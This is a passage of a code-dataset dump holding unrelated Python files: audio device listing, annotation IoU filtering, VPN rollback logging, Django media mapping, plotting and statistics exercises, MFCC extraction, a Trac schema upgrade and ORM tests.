print(\"Number of API's\", api_cnt, \"Number of sound devices\", dev_cnt)\n        for i in range(dev_cnt):\n            d = self.p.get_device_info_by_index(i)\n            if 
d['maxInputChannels'] > 0:\n inputs.append(d['name'])\n if d['maxOutputChannels'] > 0:\n outputs.append(d['name'])\n\n print(\"inputs\", inputs)\n print(\"outputs\", outputs)\n self.inputDevs.values = inputs\n self.outputDevs.values = outputs\n\n\n","sub_path":"src/py3/af_widget.py","file_name":"af_widget.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"12039214","text":"import pandas as pd\nfrom process_utils import iou, writer, return_annotate_dict\nimport ipdb\n\nlabeled_dat = pd.read_csv('labeled_nuro.txt', sep='\\t')\ngt_dat = pd.read_csv('nuro_gt.txt', sep='\\t')\n\nannotation_path = 'updated_train_nuro.txt'\nuuid_path = 'updated_uuid_nuro.txt'\n\nmerged_dat = pd.merge(labeled_dat, gt_dat, on=['uuid','frame_no', 'camera_no'])\n\nipdb.set_trace()\n# merged_dat = gt_dat.merge(labeled_dat)\n\nmerged_dat['iou'] = merged_dat.apply(lambda row: iou((row['xmin_gt'], row['ymin_gt'], row['xmax_gt'], row['ymax_gt']), \n (row['x_min'], row['y_min'], row['x_max'], row['y_max'])), axis=1)\n\nprint('Computed IOU!')\nmerged_dat.to_csv('merged_dat.txt', sep='\\t')\n\n# merged_dat = pd.read_csv('merged_dat.txt', sep='\\t')\n\niou_gt_paths = list(set(merged_dat[merged_dat['iou'] > 0.75]['image_path']))\n\niou_lt_paths = list(set(merged_dat[merged_dat['iou'] <= 0.75]['image_path']))\n\nwriter('iou_gt_paths', iou_gt_paths)\nwriter('iou_lt_paths', iou_lt_paths)\n\nannotate_list = open(annotation_path).readlines()\nuuid_list = open(uuid_path).readlines() \n\nannotate_dict = return_annotate_dict(annotation_path)\nprint('Returned dict')\ngood_label_train = open('good_label_train_nuro.txt', 'w')\ngood_label_uuid = open('good_label_uuid_nuro.txt', 'w') \nbad_label_train = open('bad_label_train_nuro.txt', 'w')\nbad_label_uuid = open('bad_label_uuid_nuro.txt', 'w')\n\n# total_label_train = open('total_label_train_nuro.txt', 'w') \n# total_label_uuid = open('total_label_uuid_nuro.txt', 'w') \n\nfor path in iou_gt_paths:\n idx = annotate_dict[path]\n annotation = annotate_list[idx]\n uuid = uuid_list[idx]\n good_label_train.write(annotation)\n good_label_uuid.write(uuid)\n\nfor path in iou_lt_paths:\n idx = annotate_dict[path]\n annotation = annotate_list[idx]\n uuid = uuid_list[idx]\n bad_label_train.write(annotation)\n bad_label_uuid.write(uuid)\n\ngood_label_train.close()\ngood_label_uuid.close()\nbad_label_train.close()\nbad_label_uuid.close()\n","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"455537684","text":"from msa_sdk.variables import Variables\nfrom msa_sdk.msa_api import MSA_API\nfrom datetime import datetime\nimport json\nimport requests\n\ndev_var = Variables()\ncontext = Variables.task_call()\n\ndateTimeObj = datetime.now()\nformat = \"%Y-%m-%dT%H:%M:%S+0000\"\ntime1 = dateTimeObj.strftime(format)\nformat = \"%Y-%m-%d\"\ndate = dateTimeObj.strftime(format)\n\nurl = \"http://msa_es:9200/ubilogs-\"+date+\"/_doc\"\n\nce_list = context['ce_list']\ner_list = context['er_list']\n \nfor i in range(len(ce_list)):\n payload = {\"rawlog\": \" VPN \"+context['vpn_id']+\" configured between \"+ce_list[i]['id']+\" and \"+er_list[i]['id']+\"\", \"device_id\": \"\"+ce_list[i]['id']+\"\", \"date\": \"\"+time1+\"\", \"customer_ref\": \"TyrellCorp\", \"severity\": \"5\", \"type\": \"NOTIFICATION\", \"subtype\": \"VPN WF\"}\n headers = {'content-type': 'application/json'}\n r = 
requests.post(url, json=payload, headers=headers)\n\nif context['warning'] == 1:\n ret = MSA_API.process_content('WARNING', f'VPN {context[\"vpn_id\"]} Rollback completed, Error on some devices', context, True)\n print(ret)\nelse:\n ret = MSA_API.process_content('ENDED', f'VPN {context[\"vpn_id\"]} Rollback completed', context, True)\n print(ret)","sub_path":"VPN_Activation/Rollback_Notify.py","file_name":"Rollback_Notify.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"469464025","text":"#from django.utils import simplejson\nimport json as simplejson\nfrom media.models import *\nfrom django.forms.models import model_to_dict\nfrom citizen.models import Citizen\nfrom property.models import Property\nfrom asset.models import Business\n\nclass MediaMapper: \n \n\t\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\tGet Media by Associated Type\n\t\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \n\t@staticmethod\n\tdef getMedia(type,obj):\n\t\tkwargs = {}\n\t\tkwargs[type + '__exact'] = obj\n\t\tkwargs['i_status__exact'] = 'active'\n\t\tmediaList = Media.objects.filter(**kwargs).order_by(\"-date_created\")\n\t\tresult = []\n\t\tif mediaList:\n\t\t\tfor i in mediaList:\n\t\t\t\ttemp = model_to_dict(i)\n\t\t\t\tif i.tags:\n\t\t\t\t\ttemp['tags'] = temp['tags'].replace(\"|\",\" | \")\n\t\t\t\ttemp['associations'] = MediaMapper.getMediaAssociations(i)\n\t\t\t\ttemp['date'] = i.date_created\n\n\t\t\t\tresult.append(temp)\n\t\treturn result\n\n\t\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\tGet Media by tags\n\t\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \n\t@staticmethod\n\tdef getMediaByTags(tags):\n\t\tkwargs = {}\n\t\tif tags:\n\t\t\tfor tag in tags:\n\t\t\t\tkwargs['tags__icontains'] = tag\n\t\t\t\tkwargs['i_status__exact'] = 'active'\n\n\t\tmedia = Media.objects.filter(**kwargs)\n\t\treturn media\n\n\t@staticmethod\n\tdef getMediaAssociations(media):\n\t\tlinks = \"\"\n\t\tif media.citizen != None:\n\t\t\tcitizen = media.citizen\n\t\t\tlinks += \"C: \" + '' + citizen.getDisplayName() + \" (CID: \" + citizen.citizen_id + \")
    \"\n\t\tif media.business != None:\n\t\t\tbusiness = media.business\n\t\t\tlinks += \"B: \" + '' + business.name + \" (TIN: \" + business.tin + \")
    \"\n\t\tif media.property != None:\n\t\t\tproperty = media.property\n\t\t\tlinks += \"P: \" + '' + property.getDisplayName() + \" (UPI: \" + property.getUPI() + \")
    \"\n\t\tif media.billboard != None:\n\t\t\tbillboard = media.billboard\n\t\t\tlinks += \"Billboard: \" + '' + billboard.name + \" (UPI: \" + billboard.property.getUPI() + \")
    \"\n\n\t\treturn links\n","sub_path":"media/mappers/MediaMapper.py","file_name":"MediaMapper.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"32074389","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 18 20:01:16 2017\n\n@author: Administrator\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import animation\n#import matplotlib\n#matplotlib.rcParams['animation.convert_path'] = 'D:\\\\software\\\\ImageMagick-7.0.7-Q16\\\\convert.exe'\nfig,ax = plt.subplots()\n\nx = np.arange(0,2*np.pi,0.01)\nline, = ax.plot(x,np.sin(np.pi * x))\n\nax.set_ylim((-2,2))\n#ax = plt.axes(xlim=(0,7),ylim=(-2,2))\n#label = ax.text([],[],'')\n\ny = np.sin(np.pi * x)\nyy = []\n\nfor i in range(100):\n k = 2*i+1\n fk = 2 / ( k * np.pi)\n yy.append(fk * np.sin(k * np.pi * x))\n\ndef f1(i):\n line.set_ydata(np.sin(np.pi * x+i/10))\n return line,\n\n\ndef init_fun():\n \n line.set_ydata(y)\n return line,\n\n\ndef update(i):\n# global label,ax\n \n plt.text(3,1.5,r'$K=%d$'%(i+1),\n fontdict={'size': 16, 'color': 'r'})\n# ax.text(3,1.5,'K=%d'%(i+1))\n# label.set_text('k=%d'%(i+1))\n# label.set_position(['3','1.5'])\n line.set_ydata(sum(yy[0:i]) )\n# ax.text(3,1.5,' ')\n return line,\n \nani = animation.FuncAnimation(fig=fig,func = update ,frames=10, #其中一种,其他的自行搜索\n init_func=init_fun,interval=200,repeat=True,blit=True) \n\n\nani.save('ani.gif',writer='imagemagick',fps=2)\n\nplt.show()\n#import numpy as np\n#import matplotlib.pyplot as plt\n#from matplotlib.animation import FuncAnimation\n#\n## Fixing random state for reproducibility\n#np.random.seed(19680801)\n#\n#\n## Create new Figure and an Axes which fills it.\n#fig = plt.figure(figsize=(7, 7))\n#ax = fig.add_axes([0, 0, 1, 1], frameon=False)\n#ax.set_xlim(0, 1), ax.set_xticks([])\n#ax.set_ylim(0, 1), ax.set_yticks([])\n#\n## Create rain data\n#n_drops = 50\n#rain_drops = np.zeros(n_drops, dtype=[('position', float, 2),\n# ('size', float, 1),\n# ('growth', float, 1),\n# ('color', float, 4)])\n#\n## Initialize the raindrops in random positions and with\n## random growth rates.\n#rain_drops['position'] = np.random.uniform(0, 1, (n_drops, 2))\n#rain_drops['growth'] = np.random.uniform(50, 200, n_drops)\n#\n## Construct the scatter which we will update during animation\n## as the raindrops develop.\n#scat = ax.scatter(rain_drops['position'][:, 0], rain_drops['position'][:, 1],\n# s=rain_drops['size'], lw=0.5, edgecolors=rain_drops['color'],\n# facecolors='none')\n#\n#\n#def update(frame_number):\n# # Get an index which we can use to re-spawn the oldest raindrop.\n# current_index = frame_number % n_drops\n#\n# # Make all colors more transparent as time progresses.\n# rain_drops['color'][:, 3] -= 1.0/len(rain_drops)\n# rain_drops['color'][:, 3] = np.clip(rain_drops['color'][:, 3], 0, 1)\n#\n# # Make all circles bigger.\n# rain_drops['size'] += rain_drops['growth']\n#\n# # Pick a new position for oldest rain drop, resetting its size,\n# # color and growth factor.\n# rain_drops['position'][current_index] = np.random.uniform(0, 1, 2)\n# rain_drops['size'][current_index] = 5\n# rain_drops['color'][current_index] = (0, 0, 0, 1)\n# rain_drops['growth'][current_index] = np.random.uniform(50, 200)\n#\n# # Update the scatter collection, with the new colors, sizes and positions.\n# scat.set_edgecolors(rain_drops['color'])\n# scat.set_sizes(rain_drops['size'])\n# scat.set_offsets(rain_drops['position'])\n#\n#\n## Construct the animation, 
using the update function as the animation\n## director.\n#animation = FuncAnimation(fig, update, interval=10)\n#plt.show()\n","sub_path":"python_basic/matplotlib/新建文件夹/Animation.py","file_name":"Animation.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"258862574","text":"import pathlib\r\nimport csv\r\n\r\n# Point to the data file\r\ncsvpath = pathlib.Path(\"Resources/budget_data.csv\")\r\n\r\n# Create some empty lists to store the title, date, and profit/loss\r\ndate = []\r\nPl = []\r\n\r\nwith open(file=csvpath, mode='r') as csvfile:\r\n# CSV reader specifies delimiter and variable that holds contents\r\n csvreader = csv.reader(csvfile, delimiter=',')\r\n\r\n# Read the header row first to skip it, since we don't want to include it in our column lists\r\n csv_header = next(csvreader)\r\n\r\n# Add each row after the header to the date and Pl lists we created above\r\n for row in csvreader:\r\n date.append(row[0])\r\n Pl.append(float(row[1]))\r\n\r\n # Take first difference of the Profit list \r\n Difference = [Pl[i + 1] - Pl[i] for i in range(len(Pl)-1)]\r\n\r\n # Perform calculations on the lists we created\r\n Total = round(sum(Pl))\r\n DateLength = len(date)\r\n Average_Change = round(sum(Difference)/len(Difference),2)\r\n Max_Difference = round(max(Difference)) \r\n Max_Index = Difference.index(Max_Difference) \r\n Max_IndexDate = date[Max_Index+1]\r\n Min_Difference = round(min(Difference))\r\n Min_Index = Difference.index(Min_Difference) \r\n Min_IndexDate = date[Min_Index+1]\r\n\r\n# Print our results to the terminal\r\nprint(f\"Financial Analysis\")\r\nprint(\"-----------------\")\r\nprint(f\"Total months: {DateLength}\")\r\nprint(f\"Total: ${Total}\")\r\nprint(f\"Average Change: ${Average_Change}\")\r\nprint(f\"Greatest Increase in Profits: {Max_IndexDate} (${Max_Difference})\")\r\nprint(f\"Greatest Decrease in Profits: {Min_IndexDate} (${Min_Difference})\")\r\n\r\n# Specify the file to write to\r\noutput_path = pathlib.Path(\"analysis/Pybank_output.csv\")\r\n\r\n# Open the file using \"write\" mode. 
Specify the variable to hold the contents\r\nwith open(file=output_path, mode='w') as csvfile:\r\n\r\n # Initialize csv.writer\r\n csvwriter = csv.writer(csvfile, delimiter=',')\r\n\r\n # Write the first row (column headers)\r\n csvwriter.writerow(['Total months', 'Total', 'Average Change', 'Greatest_Increase in Profits_Date', 'Greatest Increase in Profits', 'Greatest Decrease in Profits Date', 'Greatest Decrease in Profts'])\r\n \r\n # Fill in the data rows\r\n csvwriter.writerow([DateLength,Total,Average_Change,Max_IndexDate,Max_Difference,Min_IndexDate,Min_Difference])\r\n \r\n\r\n","sub_path":"Main_PyBank.py","file_name":"Main_PyBank.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"379167694","text":"import numpy as np\nimport scipy.stats as stats\nimport scipy.special as special\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nsns.set_style('whitegrid')\nsns.set_context('talk')\nfrom pprint import pprint\nimport pandas as pd\npd.set_option('precision', 3)\n\ndef bernoulli(y, theta):\n return theta**y * (1 - theta)**(1 - y)\n\ndef likelihood(y, theta, axis=None):\n return np.prod(bernoulli(y, theta), axis=axis)\n\ndef log_bernoulli(y, theta):\n return y * np.log10(theta + 1e-10) + (1 - y) * np.log10(1 - theta + 1e-10)\n\ndef log_likelihood(y, theta, axis=None):\n return np.sum(log_bernoulli(y, theta), axis=axis)\n\ndef coin_flip(bias=0.5, num_flips=100):\n flips = (np.random.rand(num_flips) >= 1-bias).astype(int)\n\n return flips\n\ndef point_2():\n probabilities = []\n for y in range(2):\n for theta in [0.25, 0.5]:\n probabilities.append([y, theta, bernoulli(y, theta)])\n probabilities = pd.DataFrame(probabilities, columns=['outcome', 'theta', 'probability'])\n print(probabilities)\n\n sns.barplot(x='theta', y='probability', hue='outcome',\n data=probabilities)\n sns.despine()\n return probabilities\n\ndef point_3():\n theta = np.linspace(0, 1, 101)\n\n plt.plot(theta, bernoulli(1, theta), label='γ = 1')\n plt.plot(theta, bernoulli(0, theta), label='γ = 0')\n plt.legend()\n plt.xlabel('θ')\n plt.ylabel('Likelihood')\n\ndef point_4():\n probabilities = []\n log_probabilities = []\n bias = 0.5\n for num_flips in np.logspace(1,5,5).astype(int):\n y = coin_flip(bias, num_flips)\n theta = np.ones(y.shape)*bias\n probabilities.append([num_flips, likelihood(y, theta), log_likelihood(y, theta), 10**log_likelihood(y, theta)])\n probabilities = pd.DataFrame(probabilities, columns=['flips', 'likelihood', 'log_likelihood', 'exp_log_likehood'])\n print('Why the log-likelhood matters')\n print(probabilities)\n\n dataset = [[1], [1, 1], [1, 1, 0, 1]]\n theta = np.linspace(0, 1, 101)\n likelihoods = pd.DataFrame(columns=['theta', 'input', 'likelihood'])\n #pd.DataFrame(columns=['theta', 'input', 'likelihood'])\n for data in dataset:\n xv, yv = np.meshgrid(data, theta)\n specific_likelihood = likelihood(xv, yv, axis=1)\n\n input_string = [f'γ = {data}']*len(theta)\n likelihood_df = pd.DataFrame(list(zip(theta, input_string, specific_likelihood)),\n columns=['theta', 'input', 'likelihood'])\n likelihoods = likelihoods.append(likelihood_df, ignore_index=True)\n\n sns.lineplot(x='theta', y='likelihood', hue='input', data=likelihoods)\n sns.despine()\n plt.title('Likelihoods using normal likelihood function')\n plt.xlabel('θ')\n plt.ylabel('Likelihood')\n\n return log_probabilities\n\ndef point_5(a=1, b=1):\n theta = np.linspace(0, 1, 101)\n beta_prior = stats.beta.pdf(theta, a, b)\n 
print(np.max(beta_prior))\n\n dataset = [[1], [1, 1], [1, 1, 0, 1]]\n theta = np.linspace(0, 1, 101)\n probabilities = pd.DataFrame(columns=['theta', 'input', 'probability'])\n #pd.DataFrame(columns=['theta', 'input', 'likelihood'])\n for data in dataset:\n xv, yv = np.meshgrid(data, theta)\n specific_probability = likelihood(xv, yv, axis=1) * beta_prior / np.trapz(likelihood(xv, yv, axis=1) * beta_prior) / (theta[1] - theta[0])\n\n input_string = [f'γ = {data}']*len(theta)\n probability = pd.DataFrame(list(zip(theta, input_string, specific_probability)),\n columns=['theta', 'input', 'probability'])\n probabilities = probabilities.append(probability, ignore_index=True)\n\n sns.lineplot(x='theta', y='probability', hue='input', data=probabilities)\n sns.despine()\n plt.title(f'Probability without logs. a = {a}, b = {b}.')\n plt.xlabel('θ')\n plt.ylabel('Probability')\n\ndef point_5_log(a=1, b=1):\n theta = np.linspace(0, 1, 101)\n beta_prior = stats.beta.pdf(theta, a, b)\n\n dataset = [[1], [1, 1], [1, 1, 0, 1]]\n theta = np.linspace(0, 1, 101)\n probabilities = pd.DataFrame(columns=['theta', 'input', 'probability'])\n #pd.DataFrame(columns=['theta', 'input', 'likelihood'])\n for data in dataset:\n xv, yv = np.meshgrid(data, theta)\n specific_probability = 10**(log_likelihood(xv, yv, axis=1) + np.log10(beta_prior)) / np.trapz(10**(log_likelihood(xv, yv, axis=1) + np.log10(beta_prior))) / (theta[1] - theta[0])\n\n input_string = [f'γ = {data}']*len(theta)\n probability = pd.DataFrame(list(zip(theta, input_string, specific_probability)),\n columns=['theta', 'input', 'probability'])\n probabilities = probabilities.append(probability, ignore_index=True)\n\n sns.lineplot(x='theta', y='probability', hue='input', data=probabilities)\n sns.despine()\n plt.title(f'Probability with logs. 
a = {a}, b = {b}.')\n plt.xlabel('θ')\n plt.ylabel('Probability')\n\ndef main():\n point_2()\n plt.show()\n plt.figure()\n point_3()\n plt.show()\n plt.figure()\n point_4()\n plt.figure()\n point_5(1,1)\n plt.figure()\n point_5_log(1,1)\n plt.figure()\n point_5(2,2)\n plt.figure()\n point_5(3, 1)\n plt.figure()\n point_5(4, 2)\n plt.figure()\n point_5(15, 5)\n plt.show()\n\nif __name__ == '__main__':\n main()\n","sub_path":"03-assignment/B-task.py","file_name":"B-task.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"252129130","text":"#!/usr/bin/env python3.6\n# coding: utf-8\n#waitingforsunthreading.PY\n# Created on 2018/4/9\n# @author: zhaoyun\n\"\"\"\ndescription:子线程执行过程中锁定,执行完成后和主线程共享cpu资源,当满足条件时候,子线程又会执行直到完成\n然后子主线程一起共享资源,一直这样循环下去,直到主线程结束,所有线程结束\n\"\"\"\nfrom threading import Thread ,Event,Lock\nimport time\nlock:Lock = Lock()\ndef add():\n count =1\n while True:\n # time.sleep(3)\n if count%200 ==0:\n lock.acquire()\n print(\"rrrrr\")\n time.sleep(2)\n print(\"wwwwww\",count)\n lock.release()\n count += 1\nt = Thread(target=add)\nt.setDaemon(True)\nt.start()\n\ntime.sleep(2)\nprint( \"iam maiN threading start\")\ntime.sleep(10)\nprint(\"iam main threading end\")\n","sub_path":"demoforsuning/waitingforsunthreading.py","file_name":"waitingforsunthreading.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"84957486","text":"import os\n\nno = [\"tabletop.png\", \"resize.py\", \"README.md\", \"sounds\"]\n\nfilename_map = {\n \"h\": \"Hearts\",\n \"d\": \"Diamonds\",\n \"c\": \"Clubs\",\n \"s\": \"Spades\",\n}\n\nvalue_map = {\n 1: \"A\",\n 11: \"J\",\n 12: \"Q\",\n 13: \"K\",\n}\n\nimages = os.listdir()\n\nfor i in images:\n if i.startswith('.'):\n continue\n\n if i not in no:\n value = int(i[1:-4])\n if value == 1 or value > 10:\n value = value_map[value]\n filename = filename_map[i[0:1]] + str(value) + \".png\"\n os.system(f\"convert {i} -resize 80x111\\> {filename}\")\n","sub_path":"resize/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"301636595","text":"#동일한 클래스에서 여러개의 객체가 발생한경우\n#멤버데이터는 메모리별도로\n#멤버함수(코드) 는 공유\n#어떻게 각각의 멤버데이터 영역에 R/w self\n\nclass Test:\n def __init__(self): #생성자\n self.a = 10\n self.b = 20\n def setData(self,x,y):\n print('self id:', id(self))\n self.a = x\n self.b = y\n def show(self):\n print('show id', id(self) )\n print(self.a, self.b)\n\nobj = Test() # obj.__init__(obj)\nprint(\"obj id:\", id(obj) )\nobj.setData(1,2) #obj.setData(obj,1,2)\nobj.show() #obj.show(obj)\n\nobj1 = Test() # obj1.__init__(obj1)\nprint(\"obj1 id:\", id(obj1) )\nobj1.setData(11,22) #obj1.setData(obj1,11,22)\nobj1.show()#obj1.show(obj1)\n\n\n\n\n\n\n\n","sub_path":"Python/pythonTest_class/PythonClass/lecTest/classTest1.py","file_name":"classTest1.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"654533514","text":"# Author: Danny Milsom \n# Copyright (C) 2014 CGI IT UK Ltd\n\nfrom trac.db import Table, Column, DatabaseManager\n\nschema = [\n Table('project_message')[\n Column('name'),\n Column('message'),\n Column('button'),\n Column('mode'),\n Column('groups'),\n Column('start', type='int64'),\n Column('end', type='int64'),\n Column('author'),\n Column('created_at', 
type='int64'),\n ],\n Table('project_message_record')[\n Column('record_id', auto_increment=True),\n Column('message_name'),\n Column('agreed_by'),\n Column('agreed_at', type='int64'),\n ]\n ]\n\ndef do_upgrade(env, i, cursor):\n cursor.execute(\"\"\"CREATE TEMPORARY TABLE termsofservice_old \n AS SELECT * FROM termsofservice\"\"\")\n cursor.execute(\"\"\"CREATE TEMPORARY TABLE termsofservice_record_old\n AS SELECT * FROM termsofservice_record\"\"\")\n cursor.execute(\"DROP TABLE termsofservice\")\n cursor.execute(\"DROP TABLE termsofservice_record\")\n\n db_connector, _ = DatabaseManager(env)._get_connector()\n for table in schema:\n for statement in db_connector.to_sql(table):\n cursor.execute(statement)\n\n cursor.execute(\"\"\"INSERT into project_message (name, message, button, mode, groups, start, \"end\", author, created_at)\n SELECT name, message, button, mode, NULL, NULL, NULL, author, \"date\" FROM termsofservice_old\"\"\")\n cursor.execute(\"\"\"INSERT into project_message_record (message_name, agreed_by, agreed_at)\n SELECT name, user, time FROM termsofservice_record_old\"\"\")\n cursor.execute('DROP TABLE termsofservice_old')\n cursor.execute('DROP TABLE termsofservice_record_old')\n\n cursor.execute(\"\"\"UPDATE system\n SET name='projectmessage_schema'\n WHERE name='termsofservice_schema'\n \"\"\")\n","sub_path":"projectmessage/upgrades/db2.py","file_name":"db2.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"297826337","text":"import numpy as np\nimport librosa\nfrom scipy.fftpack import dct\n\nimport stft\n\n\ndef hz2mel(f, f0=1000):\n m0 = 1000 / np.log(1000/f0 + 1)\n return m0*np.log(f/f0 + 1)\n\n\ndef mel2hz(m, f0=1000):\n m0 = 1000 / np.log(1000/f0 + 1)\n return f0*(np.exp(m/m0) - 1)\n\n\ndef mel_filter_bank(sr, data_size, bank_size):\n mel_max = hz2mel(sr/2)\n\n n_max = data_size//2\n\n df = sr/data_size\n\n dmel = mel_max/(bank_size+1)\n mel_centers = np.arange(1, bank_size+1) * dmel\n f_centers = mel2hz(mel_centers)\n\n idx_centers = np.round(f_centers / df)\n start_idx = np.hstack(([0], idx_centers[0:bank_size - 1]))\n end_idx = np.hstack((idx_centers[1:bank_size], [n_max]))\n\n filter_bank = np.zeros((bank_size, n_max))\n for c in range(0, bank_size):\n inc = 1./(idx_centers[c]-start_idx[c])\n for i in np.arange(start_idx[c], idx_centers[c]):\n filter_bank[c, int(i)] = (i-start_idx[c])*inc\n\n dec = 1./(end_idx[c] - idx_centers[c])\n for i in np.arange(idx_centers[c], end_idx[c]):\n filter_bank[c, int(i)] = 1.0 - ((i - idx_centers[c]) * dec)\n\n return filter_bank, f_centers\n\n\ndef get_mfcc(input, sr, win_size, overlap, bank_size):\n spec = stft.faster_stft(input, win_size, overlap)[:win_size//2]\n filter_bank, _ = mel_filter_bank(sr, win_size, bank_size)\n mel_spec = np.dot(filter_bank, spec)\n mel_spec_db = librosa.amplitude_to_db(mel_spec)\n ceps = dct(mel_spec_db, axis=0)\n mfcc = ceps[:13]\n\n return mfcc\n\n\ndef calc_delta(X, width=2):\n # X = np.pad(X, ((0,0), (width+1, width+1)), 'edge')\n\n k = np.arange(-width, width+1)\n _sum = np.sum(k**2)\n\n comp = []\n for i in range(width, X.shape[1]+width):\n try:\n comp.append(np.sum(k*X[:, i-width:i+width+1], axis=1))\n except ValueError:\n break\n comp = np.array(comp).T\n\n delta = comp/_sum\n\n return delta\n","sub_path":"ex_5/kajiwara/mfcc.py","file_name":"mfcc.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 
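A minimal usage sketch for the mel_filter_bank and calc_delta helpers in the mfcc.py record above — hypothetical and not part of the dataset: it assumes that record is saved as mfcc.py on the import path and that its top-level librosa/stft imports resolve; the 16 kHz rate, 1024-sample window, and 20-band size are illustrative values, not taken from the source.

from mfcc import mel_filter_bank, calc_delta  # hypothetical: the record above saved as mfcc.py
import numpy as np

# Build a 20-band triangular mel filter bank for a 1024-point window at 16 kHz.
sr, win_size, bank_size = 16000, 1024, 20
filter_bank, f_centers = mel_filter_bank(sr, win_size, bank_size)
assert filter_bank.shape == (bank_size, win_size // 2)  # one row per band, bins up to Nyquist
print("band centre frequencies (Hz):", np.round(f_centers, 1))

# calc_delta keeps every row and drops 2*width frames: a 13 x 10 input with
# width=2 yields a (13, 6) delta matrix.
mfcc_toy = np.random.rand(13, 10)
delta = calc_delta(mfcc_toy, width=2)
print(delta.shape)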
+{"seq_id":"214844284","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2019 CERN.\n#\n# CDS Books is free software; you can redistribute it and/or modify it under\n# the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"Pytest fixtures and plugins for the API application.\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport pytest\nfrom invenio_app.factory import create_api\n\nfrom invenio_app_ils.internal_locations.api import INTERNAL_LOCATION_PID_TYPE # noqa isort:skip\nfrom invenio_app_ils.internal_locations.api import InternalLocation # noqa isort:skip\n\n\n@pytest.fixture(scope='module')\ndef create_app():\n \"\"\"Create test app.\"\"\"\n return create_api\n\n\n@pytest.fixture(scope='module')\ndef app_config(app_config):\n \"\"\"Get app config.\"\"\"\n app_config[\"APP_ALLOWED_HOSTS\"] = [\"localhost\"]\n app_config[\"CELERY_TASK_ALWAYS_EAGER\"] = True\n app_config[\"JSONSCHEMAS_SCHEMAS\"] = [\n \"acquisition\",\n \"document_requests\",\n \"documents\",\n \"eitems\",\n \"ill\",\n \"internal_locations\",\n \"items\",\n \"invenio_opendefinition\",\n \"invenio_records_files\",\n \"loans\",\n \"locations\",\n \"series\",\n \"vocabularies\",\n ]\n return app_config\n","sub_path":"tests/api/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"473465897","text":"# -*- coding: utf-8 -*-\nfrom tento.music import Artist, Album, Genre, Music, Position\n\n\ndef test_create_artist(f_session):\n name = 'Adele'\n artist = Artist(name=name)\n f_session.add(artist)\n f_session.commit()\n artist = f_session.query(Artist)\\\n .filter(Artist.name == name)\\\n .all()\n assert artist\n assert artist[0].created_at\n assert name == artist[0].name\n\n\ndef test_create_album(f_session, f_artist):\n name = '21'\n year = 2008\n album = Album(name=name,\n artist_id=f_artist.id,\n year=year)\n f_session.add(album)\n f_session.commit()\n album = f_session.query(Album)\\\n .join(Album.artist)\\\n .filter(Album.name == name)\\\n .first()\n assert album\n assert album.created_at\n assert name == album.name\n assert f_artist.id == album.artist_id\n assert year == album.year\n assert f_artist.id == album.artist.id\n assert f_artist.name == album.artist.name\n assert f_artist.created_at == album.artist.created_at\n\n\ndef test_create_genre(f_session):\n name = 'pop'\n genre = Genre(name=name)\n f_session.add(genre)\n f_session.commit()\n genre = f_session.query(Genre)\\\n .filter(Genre.name == name)\\\n .all()\n assert genre\n assert genre[0].created_at\n assert name == genre[0].name\n\n\ndef test_create_music(f_session, f_album, f_genre):\n name = 'Someone Like You'\n track_number = 1\n disc_number = 1\n music = Music(name=name,\n album=f_album,\n 